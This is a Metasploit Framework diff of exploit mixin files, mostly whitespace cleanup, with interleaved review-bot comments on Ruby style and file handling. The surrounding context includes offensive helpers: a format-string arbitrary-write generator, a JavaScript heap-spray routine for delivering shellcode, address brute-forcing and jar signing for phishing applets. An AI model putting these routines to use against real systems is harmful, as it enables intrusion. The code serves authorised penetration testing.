diff --git a/lib/msf/core/exploit/arkeia.rb b/lib/msf/core/exploit/arkeia.rb index 287f9ae093..6080218337 100644 --- a/lib/msf/core/exploit/arkeia.rb +++ b/lib/msf/core/exploit/arkeia.rb @@ -8,9 +8,9 @@ module Msf # ### module Exploit::Remote::Arkeia - + include Exploit::Remote::Tcp - + # # Creates an instance of a MSSQL exploit module. # @@ -26,8 +26,8 @@ module Exploit::Remote::Arkeia self.recv_buff = '' end - - + + # # Flush the receive buffer on a new connection # @@ -35,13 +35,13 @@ module Exploit::Remote::Arkeia super self.recv_buff = '' end - + # # This method dumps some information about the service # def arkeia_info connect - + info = { } resp = '' @@ -63,14 +63,14 @@ module Exploit::Remote::Arkeia "\x00\x34\x2e\x33\x2e\x30\x2d\x31"+ "\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00" - + sock.put(req) resp = arkeia_recv() if !(resp and resp[0,4] == "\x00\x60\x00\x04") disconnect return false end - + # Authenticate2 req = "\x00\x73\x00\x00\x00\x00\x00\x0c" + @@ -82,22 +82,22 @@ module Exploit::Remote::Arkeia if !(resp and resp[0,4] == "\x00\x60\x00\x04") disconnect return false - end - + end + # SessionSetup1 - req = + req = "\x00\x61\x00\x04\x00\x01\x00\x15"+ "\x00\x00\x31\x35\x33\x39\x38\x00"+ "\x45\x4e\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00" - + sock.put(req) resp = arkeia_recv() if !(resp and resp[0,4] == "\x00\x43\x00\x00") disconnect return false end - + # Begin the ARKADMIN_GET_CLIENT_INFO request req = "\x00\x62\x00\x01\x00\x02\x00\x25"+ 
@@ -106,33 +106,33 @@ module Exploit::Remote::Arkeia "\x45\x4e\x54\x5f\x49\x4e\x46\x4f"+ "\x00\x32\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00" - + sock.put(req) resp = arkeia_recv() if !(resp and resp[0,4] == "\x00\x43\x00\x00") disconnect return false - end - + end + # Complete the ARKADMIN_GET_CLIENT_INFO request req = "\x00\x63\x00\x04\x00\x03\x00\x11"+ "\x30\x00\x31\x00\x32\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00" - - sock.put(req) + + sock.put(req) 1.upto(5) { |i| resp = arkeia_recv() break if not resp break if resp =~ /VERSION/ } - + if !(resp and resp =~ /VERSION/) disconnect return false end - + # Store the version information mver = resp.match(/IVERSION\x00([^\x00]+)/) info['Version'] = mver[1] if mver @@ -140,7 +140,7 @@ module Exploit::Remote::Arkeia # Store the hostname information mver = resp.match(/ISERVNAME\x00([^\x00]+)/) info['Hostname'] = mver[1] if mver - + # Begin the ARKADMIN_GET_MACHINE_INFO request req = "\x00\x62\x00\x01\x00\x02\x00\x26"+ @@ -149,7 +149,7 @@ module Exploit::Remote::Arkeia "\x48\x49\x4e\x45\x5f\x49\x4e\x46"+ "\x4f\x00\x33\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00" - + sock.put(req) 1.upto(5) { |i| resp = arkeia_recv() @@ -159,15 +159,15 @@ module Exploit::Remote::Arkeia if !(resp and resp[0,2] == "\x00\x43") disconnect return info - end - + end + # Complete the ARKADMIN_GET_MACHINE_INFO request req = "\x00\x63\x00\x04\x00\x03\x00\x11"+ "\x30\x00\x31\x00\x33\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00" - + sock.put(req) 1.upto(5) { |i| resp = arkeia_recv() @@ -177,7 +177,7 @@ module Exploit::Remote::Arkeia if !(resp and resp[0,2] == "\x00\x69") disconnect return info - end + end # Finally, parse out and store all the parameters resp.split("TPVALUE\x00").each { |x| @@ -186,11 +186,11 @@ module Exploit::Remote::Arkeia info[ minf[2] ] = minf[1] end } - + disconnect return info end - + # # This method reads from the socket and parses out a single # arkeia response, buffering the rest 
@@ -203,19 +203,19 @@ module Exploit::Remote::Arkeia if (self.recv_buff.length < 8) return false end - + # Read the length header out of the message dlen = self.recv_buff[6, 2].unpack('n')[0] - + # Do we have the entire response message? if (self.recv_buff.length >= dlen + 8) return self.recv_buff.slice!(0, dlen + 8) end - + return false end - - + + attr_accessor :recv_buff end end \ No newline at end of file diff --git a/lib/msf/core/exploit/browser_autopwn.rb b/lib/msf/core/exploit/browser_autopwn.rb index b5eb542e33..adcca8f857 100644 --- a/lib/msf/core/exploit/browser_autopwn.rb +++ b/lib/msf/core/exploit/browser_autopwn.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ diff --git a/lib/msf/core/exploit/brute.rb b/lib/msf/core/exploit/brute.rb index f5afe70f60..0515f7545e 100644 --- a/lib/msf/core/exploit/brute.rb +++ b/lib/msf/core/exploit/brute.rb @@ -47,7 +47,7 @@ module Exploit::Brute stop = bf.stop_addresses ? bf.stop_addresses.dup : {} step = bf.step_size delay = bf.delay - + # Enumerate each start address and try to figure out the direction start.each_pair { |name, addr| # If there's a stop address, figure out if it's above or below @@ -64,7 +64,7 @@ module Exploit::Brute direction[name] = bf.default_direction end } - + # Import start/stop address overrides from the datastore import_from_datastore(start, 'Start') import_from_datastore(stop, 'Stop') @@ -101,7 +101,7 @@ module Exploit::Brute # Stop brute forcing once a session is found break if session_created? - + # Fire off an exploit attempt with the supplied addresses brute_exploit(curr) 
@@ -119,16 +119,16 @@ module Exploit::Brute # we're going to go over next_addr = step * direction[k] - # If this item has hit a stop address, add it to the stopped + # If this item has hit a stop address, add it to the stopped # hash and move it no further if (stop[k]) if ((direction[k] == 1 and curr[k] + next_addr >= stop[k]) or - (direction[k] == -1 and curr[k] + next_addr < stop[k])) + (direction[k] == -1 and curr[k] + next_addr < stop[k])) stopped << k next end end - + # If it's not time to stop, move it curr[k] += next_addr } @@ -141,7 +141,7 @@ module Exploit::Brute # # This routine is called once per brute force iteration. The addresses # parameter is a hash of addresses that are incremented each iteration and - # are derived from the target's bruteforce information or the module's + # are derived from the target's bruteforce information or the module's # datastore in case they are being overriden. # def brute_exploit(addrs) @@ -164,8 +164,8 @@ protected # # Imports information into the supplied hash from the datastore. - # This is a way of allowing the user to override values for a - # specific brute force target by name without them actually + # This is a way of allowing the user to override values for a + # specific brute force target by name without them actually # being conveyed in the options list. This is a bit of a change # from 2.x, but 2.x didn't have per-target brute force # addresses, which I think is more valuable. diff --git a/lib/msf/core/exploit/db2.rb b/lib/msf/core/exploit/db2.rb index 45adbc254b..3cc16fa3f6 100644 --- a/lib/msf/core/exploit/db2.rb +++ b/lib/msf/core/exploit/db2.rb @@ -28,10 +28,10 @@ module Exploit::Remote::DB2 ], Msf::Exploit::Remote::DB2) end - + # # This method sends a TCP query packet to the server, using - # datastore options and parses out the reply packet + # datastore options and parses out the reply packet # into a hash # def db2_probe(timeout=5) 
diff --git a/lib/msf/core/exploit/dect_coa.rb b/lib/msf/core/exploit/dect_coa.rb index 64b5a12f35..aa58712f1c 100644 --- a/lib/msf/core/exploit/dect_coa.rb +++ b/lib/msf/core/exploit/dect_coa.rb @@ -52,7 +52,7 @@ module Exploit::DECT_COA close_coa if self.dect_device begin - self.dect_device = File.open(datastore['INTERFACE'], "w+") + self.dect_device = File.open(datastore['INTERFACE'], "wb+") rescue ::Exception => e print_error("Could not open the Com-On-Air device at #{datastore['INTERFACE']}") print_error("This module only works on Linux with the appropriate hardware and driver, while running as root") @@ -139,13 +139,13 @@ module Exploit::DECT_COA when DECT_BAND_BOTH if (channel < 9) - set_channel(channel + 1) + set_channel(channel + 1) elsif (channel == 9) - set_channel(23) + set_channel(23) elsif (channel > 9 && channel < 27) - set_channel(channel + 1) + set_channel(channel + 1) else - set_channel(0) + set_channel(0) end end end @@ -173,7 +173,7 @@ module Exploit::DECT_COA end def parse_call(data) - { + { 'channel' => data[0], 'rssi' => data[1], 'rfpi_raw' => data[2,5], @@ -183,7 +183,7 @@ module Exploit::DECT_COA def record_coa(filename) raise RuntimeError, "DECT call recording is not supported yet" - fd = File.open(filename, 'rw') + fd = File.open(filename, 'rb+') fd.close end diff --git a/lib/msf/core/exploit/dialup.rb b/lib/msf/core/exploit/dialup.rb index aac7897474..530b351153 100644 --- a/lib/msf/core/exploit/dialup.rb +++ b/lib/msf/core/exploit/dialup.rb 
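Review bot: The `rescue ::Exception => e` wrapped around the new `File.open(datastore['INTERFACE'], "wb+")` also catches Interrupt and SystemExit, so a Ctrl-C while the device is being opened is reported as "Could not open the Com-On-Air device" instead of stopping the module. Narrowing it to `rescue ::StandardError => e` keeps the intended message for real open failures, since `Errno::*` and `IOError` are StandardError subclasses. The remainder of the rescue branch is outside the hunk, so whether the error is re-raised afterwards cannot be seen here.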
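Review bot: `'rb+'` in record_coa is a valid mode where `'rw'` was not, but it only opens an existing file for update and raises `Errno::ENOENT` when `filename` does not exist yet, which seems at odds with a recording target that would normally be created; if the intent is to create the file, `fd = File.open(filename, 'wb')` fits better. The line is unreachable in any case because the method raises on its first statement, so a comment such as `# stub: the open below is not reached until recording is implemented` would make that explicit for the next reader.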
@@ -22,24 +22,24 @@ module Exploit::Remote::Dialup ], self.class) deregister_options('RHOST') - + begin require 'telephony' @telephony_loaded = true rescue ::Exception => e @telephony_loaded = false @telephony_error = e - end + end end # Opens the modem connection def connect_dialup(global = true, opts={}) - + if (not @telephony_loaded) print_status("The serialport module is not available: #{telephony_error}") raise RuntimeError, "Telephony not available" end - + serialport = datastore['SERIALPORT'] baud = datastore['BAUDRATE'].to_i data_bits = datastore['DATABITS'].to_i @@ -57,7 +57,7 @@ module Exploit::Remote::Dialup when 'Both' ; Telephony::Modem::HARD | Telephony::Modem::SOFT else Telephony::Modem::NONE end - + initstring = datastore['INITSTRING'] dialprefix = datastore['DIALPREFIX'] dialsuffix = datastore['DIALSUFFIX'] @@ -108,7 +108,7 @@ module Exploit::Remote::Dialup end end - # Closes the modem connection + # Closes the modem connection def disconnect_dialup(nmodem = self.modem) if(nmodem) nmodem.flush @@ -136,7 +136,7 @@ module Exploit::Remote::Dialup while c c = self.modem.getc res[:buffer] += c.chr if c - end + end return res end end @@ -181,7 +181,7 @@ module Exploit::Remote::Dialup return rv end - + attr_accessor :modem end diff --git a/lib/msf/core/exploit/fmtstr.rb b/lib/msf/core/exploit/fmtstr.rb index 8cdb9ea304..4a0a92a3f0 100644 --- a/lib/msf/core/exploit/fmtstr.rb +++ b/lib/msf/core/exploit/fmtstr.rb @@ -16,12 +16,12 @@ module Exploit::FormatString # def initialize(info = {}) super - + @use_fpu = false @use_dpa = false end - - + + # # Allow caller to override the capabilities # @@ -29,7 +29,7 @@ module Exploit::FormatString @use_fpu = fpu @use_dpa = dpa end - + # # Detect the capabilities (only works for non-blind) # 
@@ -38,7 +38,7 @@ module Exploit::FormatString @use_fpu = fmtstr_detect_cap_fpu #print_status("support dpa:#{@use_dpa.to_s}, fpu:#{@use_fpu.to_s}") end - + def fmtstr_detect_cap_dpa res = trigger_fmt("|%1$08x|") return nil if not res @@ -48,7 +48,7 @@ module Exploit::FormatString end return false end - + def fmtstr_detect_cap_fpu res = trigger_fmt("|%g|") return nil if not res @@ -58,7 +58,7 @@ module Exploit::FormatString end return false end - + def fmtstr_detect_vulnerable res = trigger_fmt("|%08x|") return false if not res @@ -68,7 +68,7 @@ module Exploit::FormatString end return false end - + # NOTE: This will likely crash the target process def fmtstr_detect_exploitable begin @@ -83,40 +83,40 @@ module Exploit::FormatString end return false end - - + + # # Generates a format string that will perform an arbitrary write using # two separate short values # def generate_fmt_two_shorts(num_printed, write_to, write_what, targ = target) - + arr = Array.new arr << [ write_what & 0xffff, write_to ] arr << [ write_what >> 16, write_to + 2 ] - + stuff = fmtstr_gen_from_array(num_printed, arr, targ) end - + # # Generates a format string that will perform an arbitrary write using # two separate short values # def generate_fmtstr_from_buf(num_printed, write_to, buffer, targ = target) - + # break buffer into shorts arr = fmtstr_gen_array_from_buf(write_to, buffer, targ) - + # now build the format string in its entirety stuff = fmtstr_gen_from_array(num_printed, arr, targ) end - - + + # # Generates and returns an array of what/where pairs from the supplied buffer # def fmtstr_gen_array_from_buf(write_to, buffer, targ = target) - + # break buffer into shorts arr = Array.new off = 0 @@ -128,13 +128,13 @@ module Exploit::FormatString tb = buffer[off,2].unpack('v')[0].to_i #print_status("%d %d %d" % [off,buffer.length,tb]) addr = write_to + off - + arr << [ tb, addr ] off += 2 end return arr end - + # # Generates a format string from an array of value/address pairs # 
@@ -144,7 +144,7 @@ module Exploit::FormatString # sort the array -- for optimization arr = arr.sort { |x,y| x[0] <=> y[0] } - + # build up the addrs and fmts buffers fmts = "" addrs = "" @@ -152,18 +152,18 @@ module Exploit::FormatString arr.each do |el| # find out how much to advance the column value prec = fmtstr_target_short(el[0], num) - + # for non-dpa, if the prec is more than 8, we need something to pop if not @use_dpa and prec >= 8 addrs << rand_text(4) end - + # write here! addrs << [el[1]].pack('V') - + # put our advancement fmt (or bytes) fmts << fmtstr_advance_count(prec) - + # fmt to cause the write :) if @use_dpa fmts << "%" + num_pops.to_s + "$hn" @@ -171,11 +171,11 @@ module Exploit::FormatString else fmts << "%hn" end - + # update written count num = el[0] end - + # make sure we dont have bad characters ... if (bad_idx = has_badchars?(addrs, payload_badchars)) raise BadcharError.new(addrs, bad_idx, addrs.length, addrs[bad_idx]), @@ -190,16 +190,16 @@ module Exploit::FormatString stuff << "%8x" * num_pops end stuff << fmts - + return stuff end - - + + # # Count how many bytes will print before we reach the writing.. # def fmtstr_count_printed(num_printed, num_pad, num_pops, arr) - + num = num_printed + num_pad if not @use_dpa num += (8 * num_pops) 
@@ -211,43 +211,43 @@ module Exploit::FormatString if not @use_dpa and prec >= 8 num += 4 end - + # account for the addr to write to num += 4 npr = el[0] end return num end - + # # Generate the number to be used for precision that will create # the specified value to write - # + # def fmtstr_target_short(value, num_printed) if value < num_printed return (0x10000 - num_printed) + value end return value - num_printed end - + # # Generate a fmt that will advance the printed count by the specified amount # def fmtstr_advance_count(prec) - + # no need to advance :) return "" if prec == 0 - + # asumming %x max normal length is 8... if prec >= 8 return "%0" + prec.to_s + "x" end - + # anything else, we just put some chars in... return rand_text(prec) end - - + + # # Returns the index of any bad characters found in the supplied buffer. # (NOTE: copied from encoder.rb) @@ -263,7 +263,7 @@ module Exploit::FormatString return nil end - + # # Read a single 32-bit integer from the stack at the specified offset # @@ -271,7 +271,7 @@ module Exploit::FormatString # cant read offset 0! return nil if offset < 1 - + fmt = '' fmt << extra if @use_dpa @@ -286,14 +286,14 @@ module Exploit::FormatString fmt << "|" fmt << "%x" end - + res = trigger_fmt(fmt) return res if not res - + numstr = extract_fmt_output(res) dw = numstr.split('|')[1].to_i(16) end - + end end diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 80d716aa19..73dc44ffa2 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -88,8 +88,8 @@ module Exploit::Remote::HttpClient # def validate_fingerprint() # Don't bother checking if there's no database active. - if (framework.db.active and - datastore['FingerprintCheck'] and + if (framework.db.active and + datastore['FingerprintCheck'] and self.class.const_defined?('HttpFingerprint')) # Get the module-specific config opts = self.class.const_get('HttpFingerprint') 
@@ -180,16 +180,15 @@ module Exploit::Remote::HttpClient # def handler(nsock = nil) # If no socket was provided, try the global one. - if ((!nsock) and - (self.client)) + if ((!nsock) and (self.client)) nsock = self.client.conn end # If the parent claims the socket associated with the HTTP client, then # we rip the socket out from under the HTTP client. if (((rv = super(nsock)) == Handler::Claimed) and - (self.client) and - (nsock == self.client.conn)) + (self.client) and + (nsock == self.client.conn)) self.client.conn = nil end diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 8157d7a8dd..3d4d17496d 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb 
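Review bot: The collapsed condition `if ((!nsock) and (self.client))` and the three-line condition below it still use `and` for boolean logic; because `and` binds more loosely than `=`, the `(rv = super(nsock)) == Handler::Claimed and ...` form only works thanks to the explicit parentheses, and `&&` would make it independent of parenthesisation, e.g. `if !nsock && self.client` and `if (rv = super(nsock)) == Handler::Claimed && self.client && nsock == self.client.conn`. This is a style point only; behaviour is unchanged. The closing `end` of `handler` lies outside the hunk.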
@@ -590,20 +590,20 @@ protected def js_heap_spray js = %Q|var memory = new Array(); function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) { - var index; - var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16); - var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16); - while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; } - while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; } + var index; + var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16); + var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16); + while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; } + while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; } - var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo); - while (retSlide.length < heapBlockSize) { retSlide += retSlide; } - retSlide = retSlide.substring(0, heapBlockSize - shellcode.length); + var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo); + while (retSlide.length < heapBlockSize) { retSlide += retSlide; } + retSlide = retSlide.substring(0, heapBlockSize - shellcode.length); - var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize; - for (index = 0; index < heapBlockCnt; index++) { - memory[index] = retSlide + shellcode; - } + var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize; + for (index = 0; index < heapBlockCnt; index++) { + memory[index] = retSlide + shellcode; + } } | opts = { diff --git a/lib/msf/core/exploit/ip.rb b/lib/msf/core/exploit/ip.rb index 349b9e2072..ed33d61c63 100644 --- a/lib/msf/core/exploit/ip.rb +++ b/lib/msf/core/exploit/ip.rb @@ -24,7 +24,7 @@ module Exploit::Remote::Ip # Creates an IP socket for communicating with a remote host # def connect_ip(global = true, opts={}) - + begin nsock = Rex::Socket::Ip.create( 'Context' => 
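Review bot: Unlike the rest of this commit, the re-indentation in js_heap_spray happens inside the `%Q|...|` string literal, so it changes the bytes of the JavaScript the server emits rather than only the Ruby source layout; harmless for a browser, but worth stating with a comment above the literal such as `# NOTE: leading whitespace inside this literal is part of the served script`. If anything downstream compares a fixed length or digest of this response, the change would show up there. The method continues past the end of the hunk.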
@@ -66,12 +66,12 @@ module Exploit::Remote::Ip if (nsock == ip_sock) self.ip_sock = nil end - + # Remove this socket from the list of sockets created by this exploit remove_socket(nsock) end - # + # # Claims the IP socket if the payload so desires. # No exploits use raw socket payloads yet... # diff --git a/lib/msf/core/exploit/java.rb b/lib/msf/core/exploit/java.rb index c5a97b9230..c60990e62b 100644 --- a/lib/msf/core/exploit/java.rb +++ b/lib/msf/core/exploit/java.rb @@ -19,11 +19,11 @@ module Exploit::Java def initialize(info = {}) super - + register_advanced_options( [ - OptString.new( 'JavaCache', [true, 'Java cache location', - File.join(Msf::Config.config_directory, "javacache")]), + OptString.new( 'JavaCache', [true, 'Java cache location', + File.join(Msf::Config.config_directory, "javacache")]), OptString.new( 'AddClassPath', [false, 'Additional java classpath', nil]), ], self.class) @@ -53,14 +53,14 @@ module Exploit::Java @jvm_init = true end - + def query_jvm return @jvmInit end - + def save_to_file(classnames, codez, location) path = File.join( Msf::Config.install_root, "external", "source", location ) - + if not File.exists? path Dir.mkdir(path) end @@ -68,7 +68,7 @@ module Exploit::Java i = 0 classnames.each { |fil| file = File.join( path, fil + ".java") - fp = File.open( file, "w" ) + fp = File.open( file, "wb" ) print_status "Writing #{fil} to " + file fp.puts codez[i] i += 1 
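Review bot: The handle returned by `File.open( file, "wb" )` and kept in `fp` has no visible close in this hunk, and with `print_status` and `fp.puts` sitting between the open and whatever closes it, an exception there leaks the descriptor; the block form closes it on every path: `File.open(file, "wb") { |fp| fp.puts codez[i] }`. Pairing `classnames` with `codez` through a hand-maintained `i` counter is also fragile when the two arrays differ in length; `classnames.zip(codez).each { |fil, code| ... }` makes the pairing explicit. The save_to_file loop continues outside the hunk, so the close may well be there.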
@@ -80,34 +80,34 @@ module Exploit::Java if !@rjb_loaded or !@jvm_init raise RuntimeError, "Could not load rjb and/or the JVM: " + @java_error.to_s end - + if compile_options.class.to_s != "Array" && compile_options raise RuntimeError, "Compiler options must be of type Array." end - + compile_options = [] if compile_options.nil? # Create the directory if it doesn't exist Dir.mkdir(datastore['JavaCache']) if !File.exists? datastore['JavaCache'] - + # For compatibility, some exploits need to have the target and source version # set to a previous JRE version. std_compiler_opts = [ "-target", "1.3", "-source", "1.3", "-d", datastore['JavaCache'] ] compile_options += std_compiler_opts - + java_compiler_klass = Rjb::import('javaCompile.CompileSourceInMemory') # If we were passed arrays if classnames.class == [].class && codez.class == [].class # default compile class begin - # Sames as java_compiler_klass.CompileFromMemory( String[] classnames, + # Sames as java_compiler_klass.CompileFromMemory( String[] classnames, # String[] codez, String[] compilerOptions) success = java_compiler_klass._invoke('CompileFromMemory', # Signature explained: [ means array, Lpath.to.object; means object # Thus, this reads as call the method with 3 String[] args. - '[Ljava.lang.String;[Ljava.lang.String;[Ljava.lang.String;', + '[Ljava.lang.String;[Ljava.lang.String;[Ljava.lang.String;', classnames, codez, compile_options) rescue Exception => e print_error "Received unknown error: " + e @@ -116,10 +116,10 @@ module Exploit::Java raise RuntimeError, "The Java mixin received unknown argument-type combinations and cannot continue." end if !success - raise RuntimeError, "Compile failed." + raise RuntimeError, "Compile failed." end end - + def build_jar(output_jar, in_files) if output_jar.class != "".class || in_files.class != [].class raise RuntimeError, "Building a jar requires an output_jar and an Array of in_files." 
@@ -127,7 +127,7 @@ module Exploit::Java # Add paths in_files = in_files.map { |file| File.join(datastore['JavaCache'], file) } - + create_jar_klass = Rjb::import('javaCompile.CreateJarFile') file_class = Rjb::import('java.io.File') @@ -141,8 +141,8 @@ module Exploit::Java # # http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf # - def sign_jar(cert_cn, unsiged_jar, signed_jar, cert_alias="signFiles", msf_keystore="msfkeystore", - msf_store_pass="msfstorepass", msf_key_pass="msfkeypass") + def sign_jar(cert_cn, unsiged_jar, signed_jar, cert_alias="signFiles", msf_keystore="msfkeystore", + msf_store_pass="msfstorepass", msf_key_pass="msfkeypass") # Dependent on $JAVA_HOME/lib/tools.jar that comes with the JDK. signer_klass = Rjb::import('javaCompile.SignJar') 
@@ -150,29 +150,33 @@ module Exploit::Java # Check if the keystore exists from previous run. If it does, delete it. msf_keystore = File.join(datastore['JavaCache'], msf_keystore) File.delete msf_keystore if File.exists? msf_keystore - + # Rjb pukes on a CN with a comma in it so bad that it crashes to shell # and turns input echoing off. Simple fix for this ugly bug is # just to get rid of commas which kinda sucks but whatever. See #1543. - keytool_opts = ["-genkey", "-alias", cert_alias, "-keystore", msf_keystore, - "-storepass", msf_store_pass, "-dname", "CN=#{cert_cn.gsub(",",'')}", - "-keypass", "msfkeypass"] - + keytool_opts = [ + "-genkey", "-alias", cert_alias, "-keystore", msf_keystore, + "-storepass", msf_store_pass, "-dname", "CN=#{cert_cn.gsub(",",'')}", + "-keypass", "msfkeypass" + ] + # Build the cert keystore signer_klass._invoke('KeyToolMSF','[Ljava.lang.String;',keytool_opts) - jarsigner_opts = ["-keystore", msf_keystore, "-storepass", msf_store_pass, - "-keypass", msf_key_pass, "-signedJar", - File.join(datastore['JavaCache'], signed_jar), # Signed Jar - File.join(datastore['JavaCache'], unsiged_jar), # Input Jar we're signing - cert_alias] # The cert we're using + jarsigner_opts = [ + "-keystore", msf_keystore, "-storepass", msf_store_pass, + "-keypass", msf_key_pass, "-signedJar", + File.join(datastore['JavaCache'], signed_jar), # Signed Jar + File.join(datastore['JavaCache'], unsiged_jar), # Input Jar we're signing + cert_alias # The cert we're using + ] signer_klass._invoke('JarSignerMSF','[Ljava.lang.String;',jarsigner_opts) - + # There are warnings in the source for KeyTool/JarSigner warning that security providers # are not released, and if you are calling .main(foo) from another app, you need to release # them manually. This is not done here, and should Rjb be used for anything in the future, # this may need to be cleaned up. end - + end end 
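Review bot: In the reformatted `keytool_opts` the key password is still the literal `"-keypass", "msfkeypass"` while `jarsigner_opts` a few lines later passes `"-keypass", msf_key_pass`, so a caller that supplies a non-default `msf_key_pass` generates the key with one password and then tries to sign with another; the keytool entry should read `"-keypass", msf_key_pass` so both tools agree. The parameter spelled `unsiged_jar` (declared in the signature above the hunk) looks like a typo for `unsigned_jar`; it is positional, so renaming it does not affect callers. The comment about comma stripping on `cert_cn` is helpful and should stay with the array literal it explains.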
diff --git a/lib/msf/core/exploit/kernel_mode.rb b/lib/msf/core/exploit/kernel_mode.rb index 719e529ce5..dea13912d8 100644 --- a/lib/msf/core/exploit/kernel_mode.rb +++ b/lib/msf/core/exploit/kernel_mode.rb @@ -26,7 +26,7 @@ module Exploit::KernelMode end protected - + # # Encapsulates the supplied raw payload within a kernel-mode payload. # @@ -35,22 +35,22 @@ protected ext_opt = reqs['ExtendedOptions'] || {} # Prepend and append any buffers that were specified in the extended - # options. This can be used do perform stack adjustments and other + # options. This can be used do perform stack adjustments and other # such things against the user-mode payload rather than the # encapsulating payload. - raw = + raw = (ext_opt['PrependUser'] || '') + raw + (ext_opt['AppendUser'] || '') - # If this is a win32 target platform, try to encapsulate it in a + # If this is a win32 target platform, try to encapsulate it in a # win32 kernel-mode payload. if target_platform.supports?(Msf::Module::PlatformList.win32) ext_opt['UserModeStub'] = raw new_raw = Rex::Payloads::Win32::Kernel.construct(ext_opt) end - + # If we did not generate a new payload, then something broke. if new_raw.nil? raise RuntimeError, "Could not encapsulate payload in kernel-mode payload" diff --git a/lib/msf/core/exploit/pdf_parse.rb b/lib/msf/core/exploit/pdf_parse.rb old mode 100755 new mode 100644 index b49b2c90b0..2e0ad8f2ea --- a/lib/msf/core/exploit/pdf_parse.rb +++ b/lib/msf/core/exploit/pdf_parse.rb @@ -6,9 +6,7 @@ ### module Msf - - module Exploit::PDF_Parse - +module Exploit::PDF_Parse def initialize(info = {}) super @@ -248,10 +246,8 @@ module Msf end end - return xref_trailers, trailers, startxrefs, root_obj + return xref_trailers, trailers, startxrefs, root_obj end - end - end - +end diff --git a/lib/msf/core/exploit/pop2.rb b/lib/msf/core/exploit/pop2.rb index 42653b44cd..7c94fa4a7a 100644 --- a/lib/msf/core/exploit/pop2.rb +++ b/lib/msf/core/exploit/pop2.rb 
@@ -11,7 +11,7 @@ require 'msf/core/exploit/tcp' module Exploit::Remote::Pop2 include Exploit::Remote::Tcp - + # # Creates an instance of an POP2 exploit module. # @@ -37,7 +37,7 @@ module Exploit::Remote::Pop2 print_status("Connecting to POP2 server #{rhost}:#{rport}...") fd = super - + # Wait for a banner to arrive... self.banner = fd.get_once @@ -49,7 +49,7 @@ module Exploit::Remote::Pop2 end # - # Connect and login to the remote POP2 server using the credentials + # Connect and login to the remote POP2 server using the credentials # that have been supplied in the exploit options. # def connect_login(global = true) diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index 0057dd9dc2..4ee3cbafcd 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb @@ -54,7 +54,7 @@ module Exploit::Remote::Postgres uri = "tcp://#{ip}:#{port}" verbose = args[:verbose] || datastore['VERBOSE'] begin - self.postgres_conn = Connection.new(db,username,password,uri) + self.postgres_conn = Connection.new(db,username,password,uri) rescue RuntimeError => e case e.to_s.split("\t")[1] when "C3D000" @@ -63,14 +63,14 @@ module Exploit::Remote::Postgres when "C28000" print_error "#{ip}:#{port} Postgres - Invalid username or password: '#{username}':'#{password}'" if verbose return :error_credentials - else + else print_error "#{ip}:#{port} Postgres - Error: #{e.inspect}" if verbose return :error end end if self.postgres_conn print_good "#{ip}:#{port} Postgres - Logged in to '#{db}' with '#{username}':'#{password}'" if verbose - return :connected + return :connected end end 
@@ -83,7 +83,7 @@ module Exploit::Remote::Postgres self.postgres_conn.close if(self.postgres_conn.kind_of?(Connection) && self.postgres_conn.instance_variable_get("@conn")) self.postgres_conn = nil end - print_status "#{ip}:#{port} Postgres - Disconnected" if verbose + print_status "#{ip}:#{port} Postgres - Disconnected" if verbose end # If not currently connected, postgres_query will attempt to connect. If an @@ -97,7 +97,7 @@ module Exploit::Remote::Postgres unless self.postgres_conn return {:conn_error => true} end - if self.postgres_conn + if self.postgres_conn sql ||= datastore['SQL'] print_status "#{ip}:#{port} Postgres - querying with '#{sql}'" if datastore['VERBOSE'] begin @@ -117,7 +117,7 @@ module Exploit::Remote::Postgres end return {:sql_error => sql_error_msg} end - postgres_print_reply(resp,sql) if doprint + postgres_print_reply(resp,sql) if doprint return {:complete => resp} end end @@ -158,14 +158,14 @@ module Exploit::Remote::Postgres uri = "tcp://#{rhost}:#{rport}" verbose = args[:verbose] || datastore['VERBOSE'] begin - self.postgres_conn = Connection.new(db,username,password,uri) + self.postgres_conn = Connection.new(db,username,password,uri) rescue RuntimeError => e version_hash = analyze_auth_error e - return version_hash + return version_hash end if self.postgres_conn # Just ask for the version. resp = postgres_query("select version()",false) - ver = resp[:complete].rows[0][0] + ver = resp[:complete].rows[0][0] return {:auth => ver} end end @@ -229,7 +229,7 @@ module Exploit::Remote::Postgres end def postgres_password - if datastore['PASSWORD'].to_s.size > 0 + if datastore['PASSWORD'].to_s.size > 0 datastore['PASSWORD'].to_s else 